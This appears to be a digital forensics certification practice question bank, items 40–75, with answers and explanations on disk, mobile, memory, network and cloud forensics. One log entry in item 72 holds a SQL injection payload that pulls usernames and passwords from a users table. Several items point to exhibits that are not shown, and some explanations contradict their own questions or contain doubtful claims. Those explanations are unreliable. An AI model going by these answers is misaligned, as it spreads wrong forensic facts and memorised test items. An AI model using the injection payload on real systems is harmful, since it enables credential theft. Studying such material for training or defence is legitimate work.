Refer to the exhibit. The FTK Imager output shows a disk with an NTFS partition. The examiner notes that the $MFT mirror is at cluster 2. What is the logical size of the $MFT mirror in bytes?

A.320 GB
B.512 bytes
C.4096 bytes
D.8192 bytes
AnswerC

Correct: The $MFT mirror occupies one cluster (4096 bytes) when clusters per record = 1.

Why this answer

The $MFT mirror is a backup copy of the first four records of the Master File Table. Each MFT record is 1024 bytes, so four records total 4096 bytes. The FTK Imager output confirms the cluster size is 4096 bytes, and since the $MFT mirror occupies exactly one cluster (cluster 2), its logical size is 4096 bytes.

Exam trap

The trap here is that candidates confuse the $MFT mirror size with the cluster size or the total MFT size, but the mirror is always fixed at 4096 bytes because it backs up only the first four MFT records.

How to eliminate wrong answers

Option A is wrong because 320 GB is the total disk capacity, not the size of the $MFT mirror. Option B is wrong because 512 bytes is the size of a single sector, not the cluster size or the $MFT mirror size. Option D is wrong because 8192 bytes would be two clusters (2 × 4096), but the $MFT mirror occupies exactly one cluster.

40
Multi-Selectmedium

A forensic examiner is analyzing an Android device that was factory reset. Which TWO artefacts or methods could the examiner use to potentially recover or identify data from before the reset?

Select 2 answers
A.Performing a logical extraction via ADB
B.Recovering deleted apps via ADB backup
C.Examining the device manually through the UI
D.Analyzing Google account artefacts synced to the cloud
E.Using a physical extraction tool like Cellebrite UFED
AnswersD, E

Google account may have synced contacts, calendar, and app data before reset, recoverable via account access.

Why this answer

Option D is correct because Google account artifacts synced to the cloud (e.g., contacts, calendar, app data via Google Drive backup) persist independently of the device's local storage. Even after a factory reset, these cloud-stored artifacts can be accessed by logging into the same Google account, providing a forensic trail of pre-reset data. This leverages Google's cloud synchronization services, which are not erased by a device reset.

Exam trap

EC-Council often tests the misconception that a factory reset permanently destroys all data, but candidates must recognize that cloud-synced artifacts and physical extraction methods can recover pre-reset data, while logical methods (ADB, UI) are rendered useless by the reset.

41
MCQhard

During a forensic investigation of a Windows system infected with ransomware, the analyst discovers that the malware deleted volume shadow copies using vssadmin.exe. Which anti-forensic technique does this represent, and what is its primary purpose?

A.Encryption; to encrypt the shadow copies to prevent analysis
B.Log wiping; to remove forensic evidence of file changes and prevent data recovery
C.Timestomping; to alter timestamps of the shadow copy files
D.Data hiding; to conceal the malware's files within shadow copies
AnswerB

Deleting shadow copies removes logs that could be used for recovery, a form of log wiping.

Why this answer

Option B is correct because deleting Volume Shadow Copies using vssadmin.exe is a classic example of log wiping (anti-forensic technique). The primary purpose is to remove forensic evidence of file changes and prevent data recovery, as shadow copies contain previous versions of files that could be used to restore encrypted data or track the ransomware's activity.

Exam trap

The trap here is that candidates may confuse 'deleting shadow copies' with 'data hiding' or 'encryption' because shadow copies are often used for recovery, but the technique is specifically log wiping (anti-forensic) aimed at destroying evidence and preventing restoration.

How to eliminate wrong answers

Option A is wrong because encryption is not performed by vssadmin.exe; vssadmin.exe is a command-line tool for managing shadow copies, and deleting them does not involve encryption. Option C is wrong because timestomping refers to altering file timestamps (e.g., using tools like SetMace or timestomp), not deleting shadow copies. Option D is wrong because data hiding involves concealing files (e.g., using alternate data streams or steganography), not deleting shadow copies to prevent recovery.

42
MCQmedium

A security team suspects a data breach via an external attacker. The incident response plan requires preservation of evidence for legal proceedings. Which order of volatility should the first responder follow?

A.Capture disk image, then memory, then network connections.
B.Record network connections, capture disk image, then memory.
C.Capture memory, record network connections, acquire disk image, then collect backups.
D.Collect backups first, then disk image, then memory.
AnswerC

This follows the correct order of volatility from most to least volatile.

Why this answer

Option C is correct because the order of volatility (OOV) dictates that the most volatile data (memory/registers) must be captured first, followed by network connections, then disk images, and finally backups. This sequence minimizes data loss and ensures evidence integrity for legal proceedings, as volatile data is lost when power is removed.

Exam trap

EC-Council often tests the misconception that disk images are the most critical evidence, leading candidates to prioritize them over volatile memory and network state, which is the exact opposite of the correct order of volatility.

How to eliminate wrong answers

Option A is wrong because it starts with capturing a disk image, which is less volatile than memory and network connections; memory and network state would be lost or altered before the disk is imaged. Option B is wrong because it captures network connections before memory, but memory (RAM) is more volatile and must be acquired first to preserve transient data like running processes and encryption keys. Option D is wrong because it collects backups first, which are the least volatile and can be acquired later; starting with backups risks losing volatile evidence in memory and network connections.

43
MCQeasy

A forensic examiner needs to acquire a hard drive that is part of a RAID 5 array. The RAID controller is unavailable. What is the best approach to acquire the data?

A.Acquire each disk individually, then reconstruct the array using software
B.Acquire only one disk because RAID 5 can be reconstructed from a single disk
C.Use a hardware write blocker that supports RAID
D.Connect the RAID array to a similar controller and acquire as a single drive
AnswerA

This is the standard method when the controller is unavailable.

Why this answer

When the RAID controller is unavailable, the only reliable method to acquire the data is to image each physical disk individually using a forensic write blocker, then reconstruct the logical RAID 5 volume in a forensic software tool (e.g., FTK Imager, X-Ways Forensics, or EnCase). This preserves the original evidence on each disk and allows the examiner to rebuild the array by specifying the stripe size, parity rotation, and disk order, which is essential because RAID 5 distributes data and parity across all disks and can tolerate a single disk failure.

Exam trap

EC-Council often tests the misconception that a hardware RAID controller is required for forensic acquisition, or that a single disk from a RAID 5 array contains enough data to reconstruct the volume, when in fact individual disk imaging and software reconstruction is the only forensically sound approach when the controller is unavailable.

How to eliminate wrong answers

Option B is wrong because RAID 5 requires at least three disks and uses distributed parity; a single disk contains only stripes and parity blocks, not the complete data, so reconstruction from one disk is impossible. Option C is wrong because a hardware write blocker that supports RAID would still require the RAID controller to present the logical volume; without the controller, the write blocker cannot access the array as a single drive. Option D is wrong because connecting the disks to a similar controller may cause the controller to attempt an automatic rebuild or initialization, altering the evidence, and the controller's configuration (e.g., stripe size, disk order) may not match the original, leading to data corruption or loss.

44
MCQeasy

Which tool is specifically designed for parsing and analyzing email headers to trace the origin of an email and detect spoofing?

A.Wireshark
B.EnCase
C.Nmap
D.EmailTrackerPro
AnswerD

It is designed for email header analysis and spoofing detection.

Why this answer

EmailTrackerPro is a commercial tool that parses email headers, extracts routing information, and helps detect spoofing by analyzing Received headers and X-Originating-IP.

45
MCQhard

During a network forensics investigation, an analyst reviews NetFlow data and notices a one-way flow of UDP traffic from an internal host to an external IP on port 53. However, the packet capture shows the external IP responding with large DNS responses. What type of data exfiltration technique is MOST likely being used?

A.ICMP tunneling
B.DNS tunneling
C.SSH tunneling
D.HTTP tunneling
AnswerB

DNS tunneling uses DNS queries/responses to exfiltrate data, often with large responses.

Why this answer

DNS tunneling involves encoding data in DNS queries and responses. The one-way flow observation might be due to NetFlow's view, but the large responses suggest data being returned via DNS responses.

46
MCQeasy

During a mobile forensic investigation of an iPhone, an examiner needs to recover deleted SMS messages. Which acquisition method provides the highest likelihood of retrieving deleted data from the device's flash memory?

A.Manual acquisition by taking screenshots
B.File system acquisition via iOS file system extraction
C.Physical acquisition via JTAG or chip-off
D.Logical acquisition via iTunes backup
AnswerC

Physical acquisition copies the entire flash memory, enabling recovery of deleted data.

Why this answer

Physical acquisition via JTAG or chip-off provides the highest likelihood of recovering deleted SMS messages because it accesses the raw NAND flash memory at the hardware level, bypassing the iOS file system and logical abstractions. Deleted data on flash storage remains in unallocated blocks until overwritten, and physical imaging captures these remnants, including deleted SQLite records from the SMS database. In contrast, logical and file system methods only retrieve active files, missing the unallocated space where deleted messages reside.

Exam trap

EC-Council often tests the misconception that file system acquisition (Option B) can recover deleted data because it extracts the entire file system, but in iOS, the file system extraction does not include unallocated space due to the HFSX/APFS design and sandboxing, making physical acquisition the only method that accesses raw NAND for deleted SMS recovery.

How to eliminate wrong answers

Option A is wrong because manual acquisition via screenshots only captures visible, on-screen content and cannot access deleted data stored in unallocated flash memory. Option B is wrong because file system acquisition via iOS file system extraction retrieves only active files and metadata, not the raw NAND blocks containing deleted SMS records that have been marked as free but not yet overwritten. Option D is wrong because logical acquisition via iTunes backup only extracts files that are part of the backup manifest, which excludes deleted data that has been removed from the SQLite WAL or journal files and is not present in the backup snapshot.

47
MCQmedium

During a forensic investigation, an analyst uses a hardware write blocker to connect a suspect hard drive to a forensic workstation. What is the primary purpose of using a hardware write blocker?

A.To prevent the operating system from writing to the source drive
B.To speed up the data transfer rate during imaging
C.To compress the forensic image to save storage space
D.To automatically hash the drive contents for integrity verification
AnswerA

This is the core function: blocking write commands to preserve evidence.

Why this answer

A hardware write blocker physically intercepts the write commands from the forensic workstation to the suspect drive, ensuring that no data can be altered on the source drive during acquisition. This preserves the evidentiary integrity of the original media, which is a foundational requirement in digital forensics to maintain a chain of custody and admissibility in court.

Exam trap

The trap here is that candidates often confuse the purpose of a write blocker with other forensic tools or features, such as hashing or compression, which are separate software functions, not hardware-level protections.

How to eliminate wrong answers

Option B is wrong because hardware write blockers do not speed up data transfer rates; they may even introduce a slight latency due to the bridge circuitry. Option C is wrong because compression of the forensic image is a software feature (e.g., EnCase or FTK Imager options), not a function of a hardware write blocker. Option D is wrong because hashing for integrity verification is performed by imaging software (e.g., using MD5 or SHA-1) after acquisition, not by the hardware write blocker itself.

48
MCQmedium

An analyst is investigating a compromised Linux system and runs `ls -i` on a deleted file's directory. The inode number is 12345. Which tool can recover the file contents by referencing the inode?

A.debugfs
B.scalpel
C.foremost
D.icat
AnswerA

debugfs is a standard tool for ext2/3/4 filesystem debugging and can retrieve data by inode.

Why this answer

The debugfs tool can be used to examine and recover files by inode on ext2/3/4 filesystems. The command `debugfs -R 'cat <12345>' /dev/sda1` would output the file contents.

49
MCQmedium

A first responder arrives at a suspected data breach scene. The system is powered on and a user is logged in. Which of the following actions should the responder take FIRST to preserve volatile data?

A.Document the scene and take photographs, then proceed to interview witnesses.
B.Immediately disconnect the network cable and power off the computer.
C.Collect volatile data such as RAM, network connections, and running processes using appropriate tools.
D.Use a hardware write-blocker to create a forensic image of the hard drive.
AnswerC

Volatile data must be captured first as it is lost when the system is powered off.

Why this answer

The first responder should capture volatile data (RAM, network connections, running processes) before powering off. Using a write-blocker to image the hard drive is done after capturing volatile data.

50
Multi-Selecthard

During dynamic analysis of a malware sample in a sandbox, an analyst observes the following behaviours: (1) A file is created at C:\Windows\System32\drivers\etc\hosts, (2) A registry key is set at HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateSvc, (3) Outbound TCP connections to 198.51.100.10 on port 8080. Which THREE of the following IoCs are MOST relevant to share with the threat intelligence team?

Select 3 answers
A.MD5 hash of the original malware file
B.Network connection to 198.51.100.10:8080
C.Registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
D.Mutex name created by the malware
E.File path C:\Windows\System32\drivers\etc\hosts
AnswersB, C, E

This is a network-based IoC indicating C2.

Why this answer

Option B is correct because the outbound TCP connection to 198.51.100.10 on port 8080 is a direct network-based indicator of compromise (IoC) that threat intelligence teams can use to block or monitor malicious C2 traffic. This IP and port combination represents a specific command-and-control endpoint, making it highly actionable for network defense and threat hunting.

Exam trap

EC-Council often tests the distinction between observed behaviors (file creation, registry modification, network connections) and derived IoCs (hashes, mutexes), tricking candidates into selecting all listed options rather than only those directly tied to the observed actions.

51
MCQeasy

Refer to the exhibit. An investigator runs the queries on an Oracle database during a live forensic acquisition. What does the output indicate about the database transaction state?

A.The transaction has been rolled back
B.The transaction has been committed
C.No transactions are currently active
D.Exactly one transaction is currently active
AnswerD

The query returns one row with status ACTIVE.

Why this answer

The query `SELECT COUNT(*) FROM v$transaction;` returns a count of 1, which indicates that exactly one transaction is currently active in the Oracle database. The `v$transaction` view shows only uncommitted or unrolled-back transactions; a committed transaction is removed from this view. Therefore, the output confirms that one transaction is active and has not yet been committed or rolled back.

Exam trap

Cisco often tests the misconception that `v$transaction` shows all transactions including committed ones, leading candidates to incorrectly select 'No transactions are currently active' when the count is 0, or to misinterpret a count of 1 as a committed transaction.

How to eliminate wrong answers

Option A is wrong because a rolled-back transaction is no longer present in `v$transaction`, so the count would be 0, not 1. Option B is wrong because a committed transaction is also removed from `v$transaction` immediately upon commit, resulting in a count of 0. Option C is wrong because the count of 1 directly contradicts the statement that no transactions are active; the query explicitly shows one active transaction.

52
Multi-Selecteasy

Which THREE of the following are common indicators of compromise (IoCs) that can be used to detect malware infections?

Select 3 answers
A.The user's favorite color
B.The brand of the victim's computer
C.Registry key created by malware for persistence
D.MD5 or SHA-256 hash of the malware file
E.IP address of the command and control server
AnswersC, D, E

Registry keys are host-based IoCs.

Why this answer

Option C is correct because malware often creates registry keys (e.g., under `HKLM\Software\Microsoft\Windows\CurrentVersion\Run`) to achieve persistence, ensuring it executes automatically on system startup. Detecting such unauthorized registry modifications is a common indicator of compromise (IoC) in forensic investigations.

Exam trap

EC-Council often tests the distinction between user-specific or hardware-specific attributes (like favorite color or computer brand) and actual system-level artifacts that indicate compromise, leading candidates to mistakenly include irrelevant options if they do not focus on technical IoCs.

53
Drag & Dropmedium

Drag and drop the steps to perform a forensic analysis of email headers to trace the origin of a spam email into the correct order.

Drag steps to the numbered slots on the right, or tap a step then tap a slot.

Steps
Order

Why this order

Email header analysis involves parsing headers, tracing IPs, and checking authentication.

54
Multi-Selectmedium

Which THREE of the following are techniques used to hide data on a hard drive?

Select 3 answers
A.File carving
B.Host Protected Area (HPA)
C.Slack space
D.Alternate Data Streams
E.Hashing
AnswersB, C, D

HPA is a hidden area on ATA drives.

Why this answer

Alternate Data Streams (ADS) hide data in NTFS streams. Slack space can hide data in unused cluster space. HPA hides data in a reserved area on ATA drives.

File carving is a recovery technique, not hiding. Hashing verifies integrity.

55
MCQeasy

In network forensics, which tool is specifically designed for packet capture and analysis, allowing examiners to inspect individual packets and reconstruct network conversations?

A.Tcpdump
B.Netstat
C.Nmap
D.Wireshark
AnswerD

Wireshark is a network protocol analyzer that captures and interactively browses traffic.

Why this answer

Wireshark is the industry-standard tool for packet capture and analysis, providing deep inspection of hundreds of protocols.

56
MCQhard

During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?

A.The program was executed at 02:30:00 UTC.
B.The program was executed at 03:15:22 UTC.
C.Execution time cannot be determined from prefetch files alone.
D.The program was executed at 03:10:22 UTC after adjusting for clock skew.
AnswerB

Prefetch file creation time is recorded when the program first runs, so 03:15:22 UTC is the execution start time (assuming clock is accurate). The +5 minute discrepancy means system time was ahead, but UTC is correct.

Why this answer

Prefetch files record the time the program was first run. The last modified timestamp of the executable is not directly related to execution time. The prefetch timestamp is the best indicator of first execution, but time zone and clock skew must be considered.

However, the question asks for the MOST accurate interpretation among the options; the prefetch file creation time directly records when the program was first executed, making that the execution time.

57
MCQeasy

Refer to the exhibit. A first responder runs the netstat command on a compromised Windows workstation. Which of the following conclusions is BEST supported by the output?

A.The connection to 192.168.1.1:80 is suspicious because it is in TIME_WAIT state.
B.The UDP listener on port 5353 indicates a malware infection.
C.A process with PID 1234 is likely communicating with a remote C2 server at 10.2.3.4.
D.The workstation is running multiple virtual machines based on the local addresses.
AnswerC

Process 1234 has two established connections to the same remote IP on different ports.

Why this answer

Option C is correct because an established TCP connection (ESTABLISHED state) from the workstation to a remote IP on a high ephemeral port (49152) with PID 1234 strongly indicates active communication. This is a classic indicator of a beaconing C2 channel, as legitimate outbound connections typically use well-known ports or are short-lived. The netstat output shows PID 1234 has a persistent connection to 10.2.3.4:4444, which is a common port for malware command and control.

Exam trap

EC-Council often tests the misconception that TIME_WAIT or UDP listeners are inherently malicious, when in fact they are normal TCP/IP behaviors; the trap here is to recognize that ESTABLISHED connections to unusual ports with a specific PID are the strongest indicator of active C2 communication.

How to eliminate wrong answers

Option A is wrong because TIME_WAIT state is normal for TCP connections that have been closed; it is not inherently suspicious and is expected after a client finishes an HTTP request to 192.168.1.1:80. Option B is wrong because UDP port 5353 is used by mDNS (RFC 6762) for local network service discovery, a legitimate Windows service, and is not a reliable indicator of malware. Option D is wrong because local addresses like 127.0.0.1 and 0.0.0.0 are loopback and wildcard addresses, not evidence of virtual machines; virtual machines typically have distinct IP addresses on separate virtual network adapters.

58
Multi-Selecteasy

Which two of the following are tools used for memory forensics acquisition? (Choose TWO.)

Select 2 answers
A.Autopsy
B.FTK Imager
C.WinPmem
D.Volatility
E.LiME
AnswersC, E

Correct: WinPmem captures Windows memory.

Why this answer

WinPmem and LiME are memory acquisition tools for Windows and Linux respectively.

59
MCQmedium

During a forensic acquisition, you notice that the target drive has bad sectors. What is the best approach to acquire the drive?

A.Use dd with a higher block size to skip bad sectors
B.Use ddrescue to recover as much data as possible
C.Use FTK Imager and ignore the errors
D.Perform a physical acquisition by removing platters
AnswerB

ddrescue is designed for failing drives.

Why this answer

B is correct because ddrescue is specifically designed to handle media with bad sectors by using a sophisticated read-retry algorithm that logs errors and attempts recovery from multiple angles, including reverse reads and splitting the drive into good and bad regions. Unlike dd, which will abort or produce corrupted output on encountering a bad sector, ddrescue maximizes data recovery while preserving a map of unrecoverable areas.

Exam trap

EC-Council often tests the misconception that dd can handle bad sectors by adjusting block size, but the trap is that dd lacks any error recovery algorithm and will simply fail or produce incomplete data, whereas ddrescue is the proper tool for forensic acquisition of damaged media.

How to eliminate wrong answers

Option A is wrong because increasing the block size in dd does not skip bad sectors; it only changes the read granularity, and a bad sector within a larger block will still cause an I/O error, potentially aborting the entire acquisition. Option C is wrong because FTK Imager, while capable of ignoring read errors, does not actively attempt to recover data from bad sectors; it simply skips them and logs the error, resulting in data loss without the advanced retry and mapping capabilities of ddrescue. Option D is wrong because physically removing platters is an extreme, destructive method reserved for drives with severe mechanical failure or when the drive cannot be powered on; it is not the best approach for a drive with only bad sectors, as it risks total data loss and is unnecessary when software tools like ddrescue can recover most data.

60
MCQhard

An investigator finds the above IAM policy attached to an S3 bucket. What is the security concern?

A.The resource does not include all objects
B.The policy version is outdated
C.The bucket is publicly accessible to read objects
D.The policy allows anyone to write objects to the bucket
AnswerC

Principal: * allows any user to perform GetObject.

Why this answer

Option C is correct because the IAM policy's `Principal` is set to `"*"` (wildcard), which means any unauthenticated user or anonymous entity on the internet can perform the `s3:GetObject` action. This makes the S3 bucket publicly readable, exposing all objects stored in the bucket to anyone who knows the bucket name and object key. The `Effect` is `Allow` and there is no condition restricting access, so the policy grants open read access to the entire bucket.

Exam trap

EC-Council often tests the distinction between a wildcard `Principal` (public access) and a wildcard `Resource` (which is normal for bucket policies), so candidates mistakenly think the `/*` in the Resource field is the security issue, when it is actually the `"*"` in the Principal field that creates the vulnerability.

How to eliminate wrong answers

Option A is wrong because the `Resource` field uses `arn:aws:s3:::example-bucket/*`, which correctly includes all objects within the bucket (the `/*` suffix covers all object keys). Option B is wrong because the policy version `2012-10-17` is the current and recommended version for IAM policies; there is no security concern tied to using this version. Option D is wrong because the policy only grants `s3:GetObject` (read) permission, not `s3:PutObject` or any write action, so it does not allow anyone to write objects to the bucket.

61
MCQeasy

Which of the following is the BEST example of direct evidence in a computer forensics investigation?

A.A document found on the suspect's computer with content about the crime
B.A server log showing the suspect's IP address accessed a restricted file at the time of the incident
C.Expert testimony that the suspect's computer contained malware
D.A witness testifying that the suspect was the only person who knew the password
AnswerB

This directly shows the access event, linking the IP to the action.

Why this answer

Direct evidence directly proves a fact without requiring inference. A server log showing the suspect's IP address accessing a restricted file at the time of the incident is direct evidence because it directly links the suspect's system to the specific action (accessing the file) at the relevant time, without needing additional reasoning or assumptions. This is based on the principle that logs capture actual system events, making them direct proof of the occurrence of that event.

Exam trap

EC-Council often tests the distinction between direct and circumstantial evidence; the trap here is that candidates mistakenly classify any evidence found on a suspect's computer (like a document) as direct, when in fact it is circumstantial because it requires additional inference to connect it to the crime.

How to eliminate wrong answers

Option A is wrong because a document found on the suspect's computer with content about the crime is circumstantial evidence; it requires inference that the suspect created or possessed the document with intent, and does not directly prove the crime occurred. Option C is wrong because expert testimony that the suspect's computer contained malware is indirect evidence; it only proves the presence of malware, not that the malware was used to commit the crime or that the suspect was responsible. Option D is wrong because a witness testifying that the suspect was the only person who knew the password is hearsay or opinion evidence, not direct evidence; it does not directly prove any action or event, only a belief about knowledge.

62
MCQeasy

Which of the following mobile forensics tools is specifically designed to extract data from iOS devices by exploiting the device's bootrom vulnerability (e.g., checkm8) to perform a physical extraction?

A.Oxygen Forensic Detective
B.Cellebrite UFED
C.Magnet AXIOM
D.GrayKey
AnswerD

GrayKey is a tool that leverages the checkm8 bootrom exploit for physical extraction.

Why this answer

GrayKey is correct because it is a mobile forensic tool specifically designed to exploit the checkm8 bootrom vulnerability (a permanent, unpatchable exploit affecting A5 to A11 chips) to perform a physical extraction of iOS devices. This allows bypassing the device's passcode and extracting the full file system, including encrypted data, without needing to jailbreak the device.

Exam trap

EC-Council often tests the distinction between tools that perform logical or file system extractions versus those that exploit hardware-level bootrom vulnerabilities for physical extraction, and the trap here is that candidates may confuse Cellebrite UFED's broader capabilities with GrayKey's specialized, bootrom-specific design.

How to eliminate wrong answers

Option A is wrong because Oxygen Forensic Detective is a comprehensive forensic platform that supports logical, file system, and cloud extractions from iOS devices, but it does not natively exploit bootrom vulnerabilities like checkm8 for physical extraction. Option B is wrong because Cellebrite UFED uses advanced techniques like brute-force attacks and checkm8-based extractions via its Cellebrite Advanced Unlock (CAU) module, but it is not specifically designed solely for bootrom exploitation; it relies on a combination of methods and is not the tool most exclusively associated with checkm8. Option C is wrong because Magnet AXIOM is a digital forensic analysis platform that processes data from various sources, including mobile devices, but it does not perform physical extraction via bootrom exploits; it relies on acquisition tools like UFED or GrayKey for the actual extraction.

63
MCQeasy

During a forensic analysis of a Windows 10 system, an investigator needs to locate the Master File Table ($MFT) to analyze file metadata. Which file system structure contains the $MFT?

A.ext4 superblock
B.FAT32's File Allocation Table
C.HFS+ catalog file
D.NTFS volume's Master File Table
AnswerD

Correct: $MFT is the Master File Table in NTFS.

Why this answer

The $MFT is a core NTFS system file that contains metadata for all files and directories on an NTFS volume.

64
MCQmedium

In iOS forensics, which database file typically contains the call history, including incoming, outgoing, and missed calls?

A.Notes.db
B.call_history.db
C.AddressBook.db
D.SMS.db
AnswerB

Correct database for call records.

Why this answer

In iOS forensics, the call history (incoming, outgoing, and missed calls) is stored in the SQLite database file named `call_history.db`. This database is located within the root domain of the iOS file system (typically under `/private/var/mobile/Library/CallHistoryDB/`) and contains tables such as `call` and `call_history` that record each call's direction, duration, timestamp, and associated contact identifier. The CHFI exam specifically tests this file as the authoritative source for call log evidence.

Exam trap

EC-Council often tests the misconception that `AddressBook.db` or `SMS.db` might contain call logs because they store contact names and message threads, but the trap is that call history is stored in a separate, dedicated database (`call_history.db`) that is not linked to the address book or SMS databases.

How to eliminate wrong answers

Option A is wrong because `Notes.db` stores user notes and not call history; it is located in the `/private/var/mobile/Library/Notes/` directory and contains tables like `ZNOTE` and `ZNOTEBODY`. Option C is wrong because `AddressBook.db` (now `Contacts.db` in newer iOS versions) stores contact information (names, phone numbers, email addresses) but does not contain call log records; it is used for address book data, not call history. Option D is wrong because `SMS.db` stores SMS and iMessage conversations, including text messages and attachments, but not call history; it is found in `/private/var/mobile/Library/SMS/` and contains tables like `message` and `chat`.

65
MCQmedium

An analyst notices that a file on an NTFS volume occupies 4096 bytes on disk but its actual data is only 100 bytes. The extra space contains remnants of a previously deleted file. What is this extra space called?

A.Volume slack
B.Free space
C.RAM slack
D.File slack
AnswerD

File slack is the unused space in the last cluster of a file that may contain data from other files.

Why this answer

File slack is the unused space between the end of the file data and the end of the last cluster allocated to the file.

66
MCQmedium

During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?

A..plist files in ~/Library/Preferences
B.Unified logging (log stream)
C.Quick Look server logs
D.FSEvents files in /.fseventsd
AnswerD

FSEvents records file system changes with timestamps and can be parsed for forensic timeline.

Why this answer

FSEvents is a macOS feature that logs file system events in a binary format, useful for tracking file creation, modification, and deletion.

67
Multi-Selecthard

An analyst is conducting memory forensics on a Windows system using Volatility. Which THREE commands can provide information about network connections?

Select 3 answers
A.netscan
B.pstree
C.connscan
D.sockets
E.pslist
AnswersA, C, D

Why this answer

netscan, connscan, and sockets are Volatility plugins used to enumerate network connections. pslist and pstree list processes.

68
MCQhard

An analyst is examining a RAID 5 array of three disks. One disk has failed and been replaced; the array is rebuilding. Which of the following is the most significant forensic challenge regarding data acquisition from this array?

A.The failed disk cannot be imaged because it is physically damaged
B.The rebuild process may overwrite unallocated space or remnants of deleted files
C.RAID 5 arrays cannot be imaged using traditional tools like dd
D.The array must be imaged while degraded to preserve evidence
AnswerB

Correct: Rebuild writes parity and data, potentially destroying evidence.

Why this answer

RAID 5 distributes parity across disks. During rebuild, write operations occur that can overwrite deleted data or alter metadata, complicating acquisition.

69
Multi-Selectmedium

Which TWO of the following are essential steps that a first responder should take when arriving at a digital crime scene? (Select TWO)

Select 2 answers
A.Capture volatile data from running systems
B.Immediately start the forensic imaging process
C.Install forensic software on the suspect's computer
D.Interview all witnesses without documentation
E.Photograph and document the scene
AnswersA, E

Volatile data is lost when power is removed; capture it early.

Why this answer

A is correct because volatile data (e.g., RAM contents, running processes, network connections) is lost when power is removed. A first responder must capture this data using tools like `dd` or `memdump` before shutting down the system, as it may contain encryption keys, active malware, or evidence of ongoing network activity.

Exam trap

EC-Council often tests the misconception that imaging the hard drive is the first priority, but the trap here is that volatile data (RAM, network state) must be captured first to prevent permanent loss.

70
MCQmedium

An Android device is found with factory reset performed. The forensic examiner wants to recover as much data as possible. Which of the following artefacts is MOST likely to survive a factory reset and provide useful evidence?

A.Deleted SQLite records from /data/data/
B.Data stored on the external SD card
C.Google account authentication tokens stored in AccountManager
D.Wi-Fi passwords from wpa_supplicant.conf
AnswerB

Factory reset usually does not format the external SD card, so data there may remain.

Why this answer

Factory reset wipes the /data partition, which includes /data/data/ (app data), AccountManager tokens, and system configuration files like wpa_supplicant.conf. However, external SD cards are typically not formatted during a factory reset because they are user-removable storage. Therefore, data stored on the external SD card (e.g., photos, videos, app backups) often survives intact and can provide valuable forensic evidence.

Exam trap

Cisco often tests the misconception that factory reset wipes all storage, including external SD cards, but the standard Android factory reset only targets internal partitions, leaving external storage untouched unless the user selects the additional 'Erase SD card' option.

How to eliminate wrong answers

Option A is wrong because /data/data/ is part of the internal storage that is securely wiped during a factory reset, making deleted SQLite records unrecoverable via standard forensic tools. Option C is wrong because Google account authentication tokens are stored in AccountManager within the /data/system/ partition, which is erased on factory reset. Option D is wrong because wpa_supplicant.conf resides in /data/misc/wifi/, which is also wiped during factory reset, so Wi-Fi passwords are lost.

71
MCQmedium

During a cloud forensics investigation, the investigator discovers that the cloud provider uses shared storage for multiple tenants. Which challenge is MOST likely to arise when acquiring a forensic image?

A.Physical acquisition of the storage device is required
B.No API access to the storage system
C.Inability to decrypt data at rest
D.Data commingling with other tenants
AnswerD

Shared storage can result in data from multiple tenants occupying the same physical media, complicating isolation.

Why this answer

In cloud environments with shared storage, data from multiple tenants resides on the same physical or logical volume. When acquiring a forensic image, the investigator cannot isolate a single tenant's data without also capturing other tenants' data, leading to data commingling. This violates chain-of-custody and privacy principles, making it the primary challenge.

Exam trap

EC-Council often tests the misconception that physical access or encryption are the main hurdles, but the real challenge in cloud forensics is data commingling due to shared tenancy, which complicates legal and technical acquisition.

How to eliminate wrong answers

Option A is wrong because cloud storage is abstracted from physical hardware; physical acquisition is rarely possible or necessary, as forensic acquisition is performed via APIs or snapshots. Option B is wrong because cloud providers typically offer APIs (e.g., AWS S3 API, Azure Blob Storage REST API) for accessing storage, though permissions may be restricted. Option C is wrong because while encryption at rest is common, it is not an inherent challenge of shared storage; decryption keys are usually managed by the provider or tenant and can be obtained through proper legal channels.

72
MCQmedium

A security analyst reviews an Apache access log and finds the entry: '192.168.1.10 - - [10/Mar/2025:08:12:34 +0000] "GET /index.php?id=1 UNION SELECT username,password FROM users-- HTTP/1.1" 200 2345 "-" "Mozilla/5.0"'. Which attack is indicated?

A.Cross-site scripting (XSS)
B.SQL injection
C.Path traversal
D.Webshell upload
AnswerB

The UNION SELECT clause is a classic SQL injection technique to retrieve data from other tables.

Why this answer

The UNION SELECT statement in the URI indicates a SQL injection attack. The attacker is trying to extract data from the database.

73
MCQmedium

During a forensic examination of a Windows system, the investigator finds a file named 'notes.txt' that contains a list of passwords. The file's last modified timestamp is before the incident date, but its last accessed timestamp is during the incident. Which type of evidence is this file considered?

A.Circumstantial evidence
B.Best evidence
C.Hearsay evidence
D.Direct evidence
AnswerA

The access timestamp is circumstantial; it implies the file was opened, but other explanations are possible.

Why this answer

The file 'notes.txt' has a last modified timestamp before the incident but a last accessed timestamp during the incident. This indicates the file was opened or read during the incident, but not modified. Such indirect evidence suggests the attacker may have viewed the passwords, but does not directly prove the act of using them.

Therefore, it is circumstantial evidence because it requires inference to connect the file access to the incident.

Exam trap

EC-Council often tests the distinction between direct and circumstantial evidence by presenting timestamp data that shows access without modification, leading candidates to mistakenly classify it as direct evidence because they assume 'accessed during incident' equals 'used in the incident'.

How to eliminate wrong answers

Option B (Best evidence) is wrong because best evidence refers to the original or primary source of evidence (e.g., the original file on disk), not the type of inference drawn from timestamps. Option C (Hearsay evidence) is wrong because hearsay applies to out-of-court statements offered for their truth, not to file system metadata like timestamps. Option D (Direct evidence) is wrong because direct evidence would prove a fact without inference (e.g., a video of the attacker typing the passwords), whereas the timestamp only shows access, not the action of using the passwords.

74
MCQmedium

A security analyst detects suspicious activity on a Windows workstation. They acquire RAM using WinPmem and analyze it with Volatility. Which Volatility command would list all active processes along with their parent process IDs?

A.volatility -f mem.dmp pslist
B.volatility -f mem.dmp pstree
C.volatility -f mem.dmp connscan
D.volatility -f mem.dmp netscan
AnswerB

pstree shows process hierarchy with parent PID.

Why this answer

The pstree plugin displays processes in a tree format showing parent-child relationships. pslist lists processes but not parent PIDs.

75
MCQmedium

You are responding to a suspected malware infection on a Windows 10 system. The system is still running. Which of the following should you collect FIRST?

